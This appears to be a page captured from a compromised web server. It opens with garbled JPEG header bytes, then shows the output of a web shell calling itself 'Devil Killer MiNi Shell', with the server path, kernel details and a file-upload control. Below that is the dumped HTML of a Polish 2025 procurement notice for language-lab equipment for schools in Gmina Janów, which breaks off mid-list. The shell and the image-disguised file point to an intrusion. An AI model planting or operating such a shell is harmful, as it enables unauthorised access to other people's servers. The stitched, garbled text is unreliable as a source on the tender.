JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250828/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250828/0039693401-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa i montaż fabrycznie nowego wyposażenia do pracowni językowych <br/>w czterech szkołach Gminy Janów. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zespół Obsługi Placówek Oświatowych w Janowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 240101637</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Szkolna 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Janów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-253</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL224 - Częstochowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">509765621</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zopo@janow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.janow.akcessnet.net</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa i montaż fabrycznie nowego wyposażenia do pracowni językowych <br/>w czterech szkołach Gminy Janów. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-09b7fddc-a6e9-4315-96d4-f886c75bc4e2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00396934</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-08-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00375484/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Zakup doposażenia 4 pracowni językowych dla 4 szkół podstwowych Gminy Janów</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> „Wsparcie edukacji poprzez doposażenie placówek szkolnych w Gminie Janów w ramach ” </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-09b7fddc-a6e9-4315-96d4-f886c75bc4e2 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Wyłącznie za pomocą środków komunikacji elektronicznej (ustawa z 18 lipca 2002 r.).<br/>Poprzez Platformę przetargową (https://ezamowienia.gov.pl/) lub pocztą elektroniczną.<br/>Składanie ofert:<br/>Forma elektroniczna z kwalifikowanym podpisem elektronicznym.<br/>Postać elektroniczna z podpisem zaufanym lub osobistym.<br/>Wyłącznie przez Platformę przetargową.<br/>Potwierdzenie otrzymania:<br/>Możliwość żądania potwierdzenia otrzymania wiadomości.<br/>Komunikacja ustna:<br/>Dopuszczalna tylko w trakcie negocjacji lub dla nieistotnych informacji.<br/>Wymagana pisemna notatka z rozmowy.<br/>Informacje po otwarciu ofert:<br/>Nazwy/imiona i nazwiska wykonawców oraz ceny w ofertach.<br/>Informacja o wyborze oferty:<br/>Zamieszczana na Platformie przetargowej.<br/>Doręczenie dokumentów:<br/>Dokument wysłany przez Platformę uznawany za doręczony w dniu przekazania.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">-Komunikacja między Zamawiającym a Wykonawcami odbywa się wyłącznie za pomocą środków komunikacji elektronicznej,<br/>zgodnie z ustawą z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną.<br/>-Dopuszczalne są dwie formy komunikacji: poprzez Platformę przetargową (https://ezamowienia.gov.pl/) lub pocztą elektroniczną.<br/>Składanie ofert:<br/>-Oferty składa się wyłącznie poprzez Platformę przetargową.<br/>-Oferta musi być sporządzona w formie elektronicznej, opatrzona kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub<br/>podpisem osobistym.<br/>Potwierdzenie otrzymania:<br/>-W przypadku przekazywania dokumentów elektronicznych, Zamawiający lub Wykonawca mogą zażądać potwierdzenia otrzymania<br/>wiadomości.<br/>Komunikacja ustna:<br/>-Komunikacja ustna jest dopuszczalna wyłącznie w trakcie negocjacji lub w odniesieniu do informacji nieistotnych.<br/>-Wszelkie rozmowy ustne muszą być udokumentowane w formie pisemnej notatki.<br/>Informacje po otwarciu ofert:<br/>-Niezwłocznie po otwarciu złożonych ofert, Zamawiający zamieszcza na Platformie przetargowej informacje dotyczące nazw lub<br/>imion i nazwisk wykonawców oraz cen zawartych w ofertach.<br/>Informacja o wyborze oferty:<br/>-Informacja o wyborze najkorzystniejszej oferty lub o unieważnieniu postępowania jest zamieszczana na Platformie przetargowej.<br/>Doręczenie dokumentów:<br/>-Dokument wysłany przez Platformę przetargową uznaje się za doręczony w dniu jego przekazania na Platformę.<br/>Wymagania techniczne:<br/>-Wymagania techniczne związane z korzystaniem z Platformy przetargowej są dostępne na jej stronie internetowej.<br/>-Wsparcie techniczne w zakresie działania Platformy udziela jej dostawca.<br/>Sposoby złożenia oferty:<br/>-Sposoby złożenia oferty za pośrednictwem Platformy przetargowej oraz potwierdzenia złożenia oferty (zarówno z logowaniem, jak i<br/>bez logowania) są opisane w Instrukcjach użytkowników Platformy przetargowej.<br/>Formaty dokumentów:<br/>-Dokumenty elektroniczne, w tym oferty, oświadczenia, podmiotowe środki dowodowe, przedmiotowe środki dowodowe i<br/>pełnomocnictwa, sporządza się w formatach danych określonych w przepisach wydanych na podstawie ustawy o informatyzacji<br/>działalności podmiotów realizujących zadania publiczne.<br/>-W przypadku dokumentów skompresowanych, dopuszczalne są formaty wskazane w Rozporządzeniu Rady Ministrów z dnia 21<br/>maja 2024 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w<br/>postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych.<br/>Tajemnica przedsiębiorstwa:<br/>-Jeśli dokumenty elektroniczne zawierają informacje stanowiące tajemnicę przedsiębiorstwa, Wykonawca przekazuje je w<br/>wydzielonym i odpowiednio oznaczonym pliku.<br/>Dokumenty w języku obcym:<br/>-Dokumenty sporządzone w języku obcym przekazuje się wraz z tłumaczeniem na język polski.<br/>Cyfrowe odwzorowania dokumentów papierowych:<br/>-W przypadku dokumentów papierowych, przekazuje się ich cyfrowe odwzorowanie opatrzone kwalifikowanym podpisem<br/>elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczającym zgodność z oryginałem.<br/>Wymagania dla dokumentów elektronicznych:<br/>Dokumenty elektroniczne muszą spełniać wymagania dotyczące utrwalenia, prezentacji i zawartości informacji, umożliwiając ich<br/>wielokrotne odczytanie, zapisanie, powielenie oraz przekazanie przy użyciu środków komunikacji elektronicznej lub na<br/>informatycznym nośniku danych.<br/>Identyfikacja nadawcy i czasu odbioru:<br/>-Środki komunikacji elektronicznej w postępowaniu umożliwiają identyfikację podmiotów przekazujących dokumenty elektroniczne<br/>oraz ustalenie dokładnego czasu i daty ich odbioru</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna dotycząca przetwarzania danych osobowych<br/>w ramach projektu „Wsparcie edukacji poprzez doposażenie placówek szkolnych w Gminie Janów”<br/>Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. (RODO),<br/>informujemy, że:<br/>1. Administrator danych<br/>Administratorem Pani/Pana danych osobowych jest Gmina Janów, ul. Częstochowska 1,<br/>42-253 Janów, reprezentowana przez Zespół Obsługi Placówek Oświatowych w Janowie.<br/>2. Inspektor Ochrony Danych<br/>Wyznaczono inspektora ochrony danych, z którym można się kontaktować we wszystkich sprawach dotyczących przetwarzania<br/>danych osobowych oraz korzystania z praw związanych z przetwarzaniem poprzez adres e-mail: cezary.suchan@gmail.com lub<br/>pisemnie na adres Administratora danych.<br/>3. Cele i podstawa prawna przetwarzania danych<br/>Pani/Pana dane osobowe przetwarzane są w związku z realizacją projektu „Wsparcie edukacji poprzez doposażenie placówek<br/>szkolnych w Gminie Janów” w celu:<br/>• realizacji obowiązków wynikających z przepisów prawa związanych z realizacją projektu,<br/>• prowadzenia dokumentacji projektowej, sprawozdawczości i rozliczeń finansowych,<br/>• zapewnienia prawidłowej realizacji zadań związanych z doposażeniem placówek szkolnych.<br/>Podstawą prawną przetwarzania danych jest art. 6 ust. 1 lit. c RODO (obowiązek prawny ciążący na Administratorze) oraz art. 6 ust.<br/>1 lit. e RODO (wykonanie zadania realizowanego w interesie publicznym).<br/>4. Odbiorcy danych<br/>Odbiorcami Pani/Pana danych mogą być podmioty uprawnione do ich otrzymania na mocy przepisów prawa, w szczególności<br/>organy administracji publicznej, jednostki samorządu terytorialnego, instytucje kontrolne, a także podmioty świadczące usługi na<br/>rzecz Administratora na podstawie umów powierzenia danych.<br/>5. Okres przechowywania danych<br/>Pani/Pana dane osobowe będą przechowywane przez okres realizacji projektu oraz wymagany przepisami prawa i wytycznymi<br/>dotyczącymi archiwizacji dokumentacji projektowej w ramach Funduszy Europejskich, tj. co najmniej 5 lat od zatwierdzenia<br/>rozliczenia końcowego projektu lub dłużej, jeżeli wymagają tego przepisy szczególne.<br/>6. Prawa osób, których dane dotyczą<br/>Przysługuje Pani/Panu prawo do:<br/>• dostępu do swoich danych osobowych,<br/>• sprostowania danych,<br/>• ograniczenia przetwarzania,<br/>• wniesienia sprzeciwu wobec przetwarzania,<br/>• usunięcia danych (w zakresie przewidzianym prawem),<br/>• przenoszenia danych (w zakresie przewidzianym prawem),<br/>• wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych (ul. Stawki 2, 00-193 Warszawa), jeśli uzna Pani/Pan, że<br/>przetwarzanie danych narusza przepisy RODO.<br/>7. Dobrowolność podania danych<br/>Podanie danych osobowych jest obowiązkowe w zakresie wynikającym z przepisów prawa<br/>i niezbędne do udziału w projekcie. Niepodanie danych uniemożliwi uczestnictwo<br/>w projekcie.<br/>8. Zautomatyzowane podejmowanie decyzji<br/>Pani/Pana dane osobowe nie będą podlegały zautomatyzowanemu podejmowaniu decyzji, w tym profilowaniu.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Klauzula informacyjna dotycząca przetwarzania danych osobowych<br/>w ramach projektu „Wsparcie edukacji poprzez doposażenie placówek szkolnych w Gminie Janów”<br/>Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. (RODO),<br/>informujemy, że:<br/>1. Administrator danych<br/>Administratorem Pani/Pana danych osobowych jest Gmina Janów, ul. Częstochowska 1,<br/>42-253 Janów, reprezentowana przez Zespół Obsługi Placówek Oświatowych w Janowie.<br/>2. Inspektor Ochrony Danych<br/>Wyznaczono inspektora ochrony danych, z którym można się kontaktować we wszystkich sprawach dotyczących przetwarzania<br/>danych osobowych oraz korzystania z praw związanych z przetwarzaniem poprzez adres e-mail: cezary.suchan@gmail.com lub<br/>pisemnie na adres Administratora danych.<br/>3. Cele i podstawa prawna przetwarzania danych<br/>Pani/Pana dane osobowe przetwarzane są w związku z realizacją projektu „Wsparcie edukacji poprzez doposażenie placówek<br/>szkolnych w Gminie Janów” w celu:<br/>• realizacji obowiązków wynikających z przepisów prawa związanych z realizacją projektu,<br/>• prowadzenia dokumentacji projektowej, sprawozdawczości i rozliczeń finansowych,<br/>• zapewnienia prawidłowej realizacji zadań związanych z doposażeniem placówek szkolnych.<br/>Podstawą prawną przetwarzania danych jest art. 6 ust. 1 lit. c RODO (obowiązek prawny ciążący na Administratorze) oraz art. 6 ust.<br/>1 lit. e RODO (wykonanie zadania realizowanego w interesie publicznym).<br/>4. Odbiorcy danych<br/>Odbiorcami Pani/Pana danych mogą być podmioty uprawnione do ich otrzymania na mocy przepisów prawa, w szczególności<br/>organy administracji publicznej, jednostki samorządu terytorialnego, instytucje kontrolne, a także podmioty świadczące usługi na<br/>rzecz Administratora na podstawie umów powierzenia danych.<br/>5. Okres przechowywania danych<br/>Pani/Pana dane osobowe będą przechowywane przez okres realizacji projektu oraz wymagany przepisami prawa i wytycznymi<br/>dotyczącymi archiwizacji dokumentacji projektowej w ramach Funduszy Europejskich, tj. co najmniej 5 lat od zatwierdzenia<br/>rozliczenia końcowego projektu lub dłużej, jeżeli wymagają tego przepisy szczególne.<br/>6. Prawa osób, których dane dotyczą<br/>Przysługuje Pani/Panu prawo do:<br/>• dostępu do swoich danych osobowych,<br/>• sprostowania danych,<br/>• ograniczenia przetwarzania,<br/>• wniesienia sprzeciwu wobec przetwarzania,<br/>• usunięcia danych (w zakresie przewidzianym prawem),<br/>• przenoszenia danych (w zakresie przewidzianym prawem),<br/>• wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych (ul. Stawki 2, 00-193 Warszawa), jeśli uzna Pani/Pan, że<br/>przetwarzanie danych narusza przepisy RODO.<br/>7. Dobrowolność podania danych<br/>Podanie danych osobowych jest obowiązkowe w zakresie wynikającym z przepisów prawa<br/>i niezbędne do udziału w projekcie. Niepodanie danych uniemożliwi uczestnictwo<br/>w projekcie.<br/>8. Zautomatyzowane podejmowanie decyzji<br/>Pani/Pana dane osobowe nie będą podlegały zautomatyzowanemu podejmowaniu decyzji, w tym profilowaniu.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZOPO.26.PROJ.6.02.PJ.1.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa, montaż, uruchomienie oraz przeszkolenie z obsługi fabrycznie nowych pracowni językowych w czterech szkołach podstawowych Gminy Janów. Każda pracownia obejmuje w szczególności: jednostkę centralną z oprogramowaniem, komputer stacjonarny do obsługi systemu, stanowiska uczniowskie z pulpitem i zestawem słuchawkowym, stanowisko nauczyciela z monitorem dotykowym, głośniki oraz meble szkolne. Zamówienie obejmuje również dostarczenie i instalację niezbędnego oprogramowania, rozruch technologiczny oraz przeszkolenie użytkowników. Wszystkie elementy muszą być fabrycznie nowe, dopuszczone do użytku w jednostkach oświatowych i objęte gwarancją producenta zgodnie z wymaganiami SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30200000-1 - Urządzenia komputerowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30213300-8 - Komputer biurkowy</p> <p class="mb-0">30232000-4 - Sprzęt peryferyjny</p> <p class="mb-0">30236000-2 - Różny sprzęt komputerowy</p> <p class="mb-0">32342200-4 - Słuchawki douszne</p> <p class="mb-0">32342412-3 - Głośniki</p> <p class="mb-0">39121100-7 - Biurka</p> <p class="mb-0">48000000-8 - Pakiety oprogramowania i systemy informatyczne</p> <p class="mb-0">48700000-5 - Pakiety oprogramowania użytkowego</p> <p class="mb-0">51000000-9 - Usługi instalowania (z wyjątkiem oprogramowania komputerowego)</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres udzielonej gwarancji na przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas reakcji i tryb serwisu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	Zdolność do występowania w obrocie gospodarczym<br/>Zamawiający nie określa warunków udziału w postępowaniu w tym zakresie.<br/>2.	Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej<br/>Zamawiający nie określa warunków udziału w postępowaniu w tym zakresie.<br/>3.	Sytuacja ekonomiczna lub finansowa<br/>Zamawiający nie określa warunków udziału w postępowaniu w tym zakresie.<br/>4.	Zdolność techniczna lub zawodowa<br/>Zamawiający nie określa warunków udziału w postępowaniu w tym zakresie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu wykazania braku podstaw wykluczenia z postępowania Zamawiający żąda jedynie złożenia oświadczenia, o którym mowa w art. 125 ustawy (oświadczenie o braku podstaw wykluczenia z postępowania), które to należy złożyć wraz z ofertą (załącznik nr 2 do SWZ).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Słuchawki z mikrofonem dla uczniów	Certyfikat CE, parametry techniczne mikrofonu i słuchawek (pasmo, moc, impedancja, czułość), obudowa odporna na uszkodzenia, elastyczny pałąk	Certyfikat CE, karta katalogowa producenta / specyfikacja techniczna<br/>2	Słuchawki z mikrofonem dla nauczyciela	Certyfikat CE, parametry mikrofonu (dynamiczny, kierunkowy, redukcja szumów), parametry słuchawek (pasmo, moc, impedancja, czułość), przewód wzmocniony linką stalową	Certyfikat CE, karta katalogowa producenta / specyfikacja techniczna<br/>3	Pulpit uczniowski	Przyłącza poza zasięgiem ucznia, brak regulacji głośności, wzmacniacz sygnału, łatwy montaż	Karta katalogowa / opis producenta, zdjęcia aranżacyjne<br/>4	Głośnik montowany w blendzie biurka lektorskiego	Moc ≥ 40 W, pasmo 36–18000 Hz, średnica ≥ 14 cm, sprawność ≥ 90 dB	Specyfikacja techniczna producenta, karta katalogowa<br/>5	Biurko nauczycielskie	Laminat 18 mm, okleina PCV min. 2 mm, blenda 50 cm, kanał kablowy, nadstawka na monitor, certyfikat dopuszczający do użytku w szkołach	Certyfikat dopuszczenia do użytku w oświacie, karta katalogowa, zdjęcie produktu<br/>6	Stolik uczniowski 2-osobowy	Laminat 18 mm, okleina PCV min. 2 mm, blenda 50 cm, kanał kablowy 12×12 cm, przepusty kablowe, wymiary 120–130×60–70 cm	Certyfikat dopuszczenia do użytku w oświacie, karta katalogowa, zdjęcia produktu<br/>7	Krzesło nauczyciela	